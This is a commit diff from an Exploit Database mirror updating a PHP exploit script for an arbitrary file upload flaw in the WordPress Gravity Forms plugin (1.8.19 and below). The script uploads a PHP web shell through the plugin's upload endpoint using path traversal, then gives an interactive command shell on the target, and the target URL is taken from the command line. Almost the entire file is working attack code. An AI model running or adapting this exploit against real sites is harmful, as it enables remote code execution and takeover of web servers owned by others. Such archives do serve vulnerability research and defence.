bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-06-20

Browse source
This commit is contained in:
Offensive Security 2016-06-20 05:06:31 +00:00
parent a7daa4c3b6
commit eb4f2190bb
1 changed files with 31 additions and 23 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

52
platforms/php/webapps/39969.php
View file

@ -1,37 +1,45 @@
<?php <?php
/****************************************************************************************************************************
# Exploit Title: Wordpress Gravity Forms - Arbitrary File Upload *
# Vendor Homepage: http://www.gravityforms.com/ * Exploit Title : Gravity Forms [WP] - Arbitrary File Upload
# Vulnerable Version(s): 1.8.19 (and below) * Vulnerable Version(s): 1.8.19 (and below)
# Exploit Author: Abk Khan * Write-Up : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
# Contact: [ an0nguy @ protonmail.ch ] * Coded by : Abk Khan [ an0nguy @ protonmail.ch ]
# Website: http://blog.lolwaleet.com/ *
# Category: webapps *****************************************************************************************************************************/
# PS: I just wrote the exploit code by reading this write-up [ goo.gl/816np5 ] -- Don't know who found the vulnerability!
error_reporting(0); error_reporting(0);
$domain = 'http://localhost/wordpress'; echo "
_____ _ _ ______ _ _
/ ____| (_) | | ____| | | |
| | __ _ __ __ ___ ___| |_ _ _| |__ __ _| | |___
| | |_ | '__/ _` \ \ / / | __| | | | __/ _` | | / __|
| |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \
\_____|_| \__,_| \_/ |_|\__|\__, |_| \__,_|_|_|___/
__/ |
|___/ > an Exploiter by AnonGuy\n";
$domain = (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]);
$url = "$domain/?gf_page=upload"; $url = "$domain/?gf_page=upload";
$shell = "$domain/wp-content/_input_3_khan.php5"; $shell = "$domain/wp-content/_input_3_khan.php5";
$separator = '-----------------------------------------------------'; $separator = '-------------------------------------------------------------------';
$ch = curl_init($url); $ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3'); curl_setopt($ch, CURLOPT_POSTFIELDS, '<?php system($_GET[0]); ?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch); $response = curl_exec($ch);
curl_close($ch); curl_close($ch);
if (eregi('ok', $response)) { if (strpos($response, '"ok"') !== false) {
echo "$separator\nShell at $shell\n$separator\n\n"; echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n";
while ($testCom != 'bubye!') { while ($testCom != 'exit') {
$user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~')); $user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
echo "$user@b0x:~$ "; $b0x = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~'));
echo "$user@$b0x:~$ ";
$handle = fopen("php://stdin", 'r'); $handle = fopen("php://stdin", 'r');
$testCom = trim(fgets($handle)); $testCom = trim(fgets($handle));
fclose($handle); fclose($handle);
$comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n"; $comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
echo $comOut; echo $comOut;
} }
} }
@ -42,10 +50,10 @@ else {
function get_string_between($string, $start, $end) function get_string_between($string, $start, $end)
{ {
# stolen from stackoverflow! # stolen from stackoverflow!
$string = " " . $string; $string = ' ' . $string;
$ini = strpos($string, $start); $ini = strpos($string, $start);
if ($ini == 0) if ($ini == 0)
return ""; return '';
$ini += strlen($start); $ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini; $len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len); return substr($string, $ini, $len);